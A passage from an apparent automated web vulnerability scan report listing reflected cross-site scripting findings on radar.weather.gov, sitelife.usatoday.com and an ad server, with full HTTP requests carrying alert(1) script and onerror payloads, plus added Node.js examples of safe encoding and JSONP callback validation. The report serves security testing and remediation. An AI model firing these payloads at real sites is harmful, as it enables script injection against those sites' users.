GET /radar.php?rid=hdx&product=N0R7e333"%3balert(1)//b50d5d274da&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 09 May 2011 15:43:02 GMT
Date: Mon, 09 May 2011 15:38:02 GMT
Connection: close
Content-Length: 25375

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
t.checkform1." + objs[i]);
theObj.checked = true;
} else {
    theObj = eval("document.checkform1." + objs[i]);
    theObj.checked = false;
   }
   changeVisibility(theObj,i);
}
theProduct = "N0R7E333";ALERT(1)//B50D5D274DA";
var dt = "datetime";
getnewimg(theProduct,'HDX',0,dt);
}
function go(loop) { window.location.href = loop; }
function newpage(radarid,product,loop) {
   var cbox;
   var isloop = (loop==1
...[SNIP]...
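
Both Remediation detail paragraphs in this report (the one above for the cm.rub_usatoday finding and the one for the product parameter here) say to avoid echoing user data in a script context but not what to do when that is unavoidable. The following is an added example, not code from the report, from radar.weather.gov or from collective-media.net, that reproduces the vulnerable assignment seen in the radar.php response beside a hardened version, and runs both with alert() stubbed so the difference is observable outside a browser. The variable name theProduct comes from the response; the function names, the stub harness and the second payload are assumptions made for the demonstration. Runs under Node.js with no dependencies.

```javascript
// Added example (not code from the report, radar.weather.gov or
// collective-media.net): why a request parameter spliced into a <script>
// block breaks, and one safe serialisation for that context. Node.js, no
// dependencies.

// Vulnerable pattern, as in the radar.php response: the parameter is pasted
// between double quotes with no encoding at all.
function renderVulnerable(product) {
  return 'var theProduct = "' + product + '";';
}

// Hardened pattern: JSON.stringify supplies the quotes and escapes every
// character that could end the string literal; '<' and '>' are escaped on
// top of that so a value containing </script> cannot end the script element,
// and U+2028/U+2029 are escaped for engines that treat them as line breaks.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(product) {
  // No quotes in the template: the literal brings its own, whichever quote
  // style the surrounding script happens to use (double here, single in the
  // collective-media.net response).
  return 'var theProduct = ' + jsStringLiteral(product) + ';';
}

// Runs a rendered snippet with alert() stubbed, standing in for the browser.
// Returns the value theProduct ended up with and every alert() argument seen.
function execute(snippet) {
  const alerts = [];
  const run = new Function('alert', snippet + '\nreturn theProduct;');
  const theProduct = run((v) => alerts.push(v));
  return { theProduct, alerts };
}

// Constructed inputs: the scanner's payload from finding 2.104 (URL-decoded)
// and a second one that targets the script element rather than the string.
const SCANNER_PAYLOAD = 'N0R7e333";alert(1)//b50d5d274da';
const SCRIPT_CLOSE_PAYLOAD = '</script><img src=x onerror=alert(1)>';

function demo() {
  return {
    vulnerable: execute(renderVulnerable(SCANNER_PAYLOAD)),
    hardened: execute(renderHardened(SCANNER_PAYLOAD)),
    // Not executed: this one is only dangerous to the HTML parser, and the
    // point is that the hardened literal contains no '<' at all.
    hardenedScriptClose: renderHardened(SCRIPT_CLOSE_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the vulnerable run theProduct is truncated to N0R7e333 and alert(1) executes; in the hardened run nothing executes and theProduct holds the whole payload. JSON.stringify on its own is not enough for this context because it leaves < and > intact, so a value containing </script> would end the element before the JavaScript parser ever saw the string; that is what the extra replace step is for.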

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 110ce<script>alert(1)</script>11b5095b103 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two checks before relying on it: the response is served as Content-Type: application/javascript with no X-Content-Type-Options header, so the reflected <script> tag is only rendered as HTML by a browser that sniffs the body into HTML when the URL is opened directly; and parsed as JavaScript the body is a syntax error, so nothing runs when the endpoint is loaded through a <script> tag. The underlying defect stands regardless: the callback name is reflected without any validation.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0110ce<script>alert(1)</script>11b5095b103 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:12 GMT
Connection: close
Content-Length: 94408

plcb0110ce<script>alert(1)</script>11b5095b103('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...
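
The three sitelife.usatoday.com findings come from one JSONP endpoint that reflects its cb parameter verbatim as the callback name. The following is an added example, not code from sitelife.usatoday.com or from the Pluck widget, of a JSONP responder that refuses any callback that is not a plain dotted identifier and declares its content type so that a browser will not sniff the body into HTML. The regular expression, the response shape and the sample payload are assumptions made for the demonstration; the rejected callback is the scanner's value from finding 2.105. Runs under Node.js with no dependencies.

```javascript
// Added example (not code from sitelife.usatoday.com or the Pluck widget):
// a JSONP responder that only echoes a callback name matching a strict
// identifier pattern and declares its content type in a way browsers will
// not second-guess. Node.js, no dependencies.

// Dotted JavaScript identifiers only (plcb0, jQuery17_1304955427, App.cb).
// Angle brackets, quotes, parentheses and whitespace never match, so the
// scanner's payload is refused before anything is written to the body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}(?:\.[A-Za-z_$][\w$]{0,63}){0,4}$/;

function isSafeCallback(name) {
  return typeof name === 'string' && CALLBACK_RE.test(name);
}

// JSON text is almost JavaScript; escaping < and > keeps a payload containing
// </script> from ending the element if the response is ever inlined.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Builds the HTTP response as a plain object so it can be inspected offline.
// `payload` is whatever the widget needs; HTML inside it is data here and must
// be encoded by the code that later inserts it into the page.
function buildJsonpResponse(cb, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    // Stops MIME sniffing, so the body is never interpreted as HTML even if a
    // user opens the URL directly.
    'X-Content-Type-Options': 'nosniff',
  };
  if (!isSafeCallback(cb)) {
    // Do not reflect the offending value, not even in the error message.
    return { status: 400, headers, body: '/* invalid callback name */' };
  }
  return { status: 200, headers, body: cb + '(' + jsonForScript(payload) + ');' };
}

// Constructed inputs: the callback from finding 2.105 and a legitimate one,
// with a fragment of the widget markup standing in for the real payload.
const SCANNER_CALLBACK = 'plcb0110ce<script>alert(1)</script>11b5095b103';
const WIDGET_PAYLOAD = { html: '<div class="pluck-app-processing">' };

function demo() {
  return {
    rejected: buildJsonpResponse(SCANNER_CALLBACK, WIDGET_PAYLOAD),
    accepted: buildJsonpResponse('plcb0', WIDGET_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The allowlist is deliberately narrow: a callback name is a function reference, so there is no legitimate need for anything beyond identifier characters and dots. Length caps keep the name from being used as a carrier for a large blob of attacker text even when it is syntactically an identifier.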

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031 was submitted in the plckcommentonkey parameter. This input was echoed as 65069><img src=a onerror=alert(1)>cc5552da031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. One caveat before treating this as confirmed: the markup is carried inside a JavaScript string argument to the plcb0 callback, and the \" sequences around the commentOnKey value decode to plain double quotes when that string is evaluated, so in the HTML the widget eventually inserts the attribute is quoted and a bare > does not end the tag. Whether the payload fires depends on how the widget inserts this fragment into the DOM and on whether a literal double quote in the parameter is encoded, neither of which this response shows; verify in the embedding page.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:06 GMT
Connection: close
Content-Length: 34352

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_68630\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story65069><img src=a onerror=alert(1)>cc5552da031\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6993e><img src=a onerror=alert(1)>03214fcf160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The same caveat as for the plckcommentonkey parameter applies: the commentOnKeyType value sits between \" sequences inside a JavaScript string passed to the plcb0 callback, which decode to ordinary double quotes, so the attribute is quoted once the widget inserts the fragment and a bare > alone does not close the tag. Confirm in the embedding page, and check how the endpoint handles a literal double quote, before reporting this as exploitable.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:58 GMT
Connection: close
Content-Length: 34697

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
mments_94908\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story\" commentOnKeyType=\"article6993e><img src=a onerror=alert(1)>03214fcf160\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 288f6<script>alert(1)</script>9a54fef53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj not found</pre>
<BR>

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dff80<script>alert(1)</script>6fbd07804ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj not found</pre>
<BR>

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49990<script>alert(1)</script>42110efa79f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj not found</pre>
<BR>

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 204c1<script>alert(1)</script>890dbe70db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj not found</pre>
<BR>

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84d31<script>alert(1)</script>e398163a75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:43 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj not found</pre>
<BR>

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49b08<script>alert(1)</script>83ea7d8e48d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:44 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj not found</pre>
<BR>

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d044<script>alert(1)</script>95aec28d31d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj not found</pre>
<BR>

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9946<script>alert(1)</script>cb71ce7c288 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj not found</pre>
<BR>

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]

Summary

Severity:   High
